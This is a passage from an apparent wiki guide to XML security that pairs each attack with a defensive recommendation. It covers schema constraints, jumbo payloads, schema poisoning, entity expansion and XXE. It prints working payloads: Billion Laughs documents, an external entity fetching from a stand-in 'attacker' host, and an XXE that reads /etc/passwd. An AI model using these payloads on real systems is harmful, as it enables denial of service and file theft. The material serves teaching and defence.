Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
The consequences of not defining a maximum number of occurrences could be worse than coping with the consequences of what may happen when receiving extreme numbers of items to be processed. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy . &lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(A 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(A 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;LOL9;&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
RFC 2376 states that &amp;quot;Recursive expansions are prohibited [REC-XML] and XML processors are required to detect them&amp;quot;. To detect this type of behavior automatically, you must limit the number of expansions to be made, or disable the use of inline DTD schemas altogether in your XML parsing objects.  SOAP messages should be inherently safe from this vulnerability because “a SOAP message MUST NOT contain a document type declaration,”  but when this type of vulnerability was detected, certain implementations did not comply with this rule. &lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;xxe;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid a file retrieval attack, avoid using DTD and validate the content of XML documents according to the expected values of a local XML schema.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
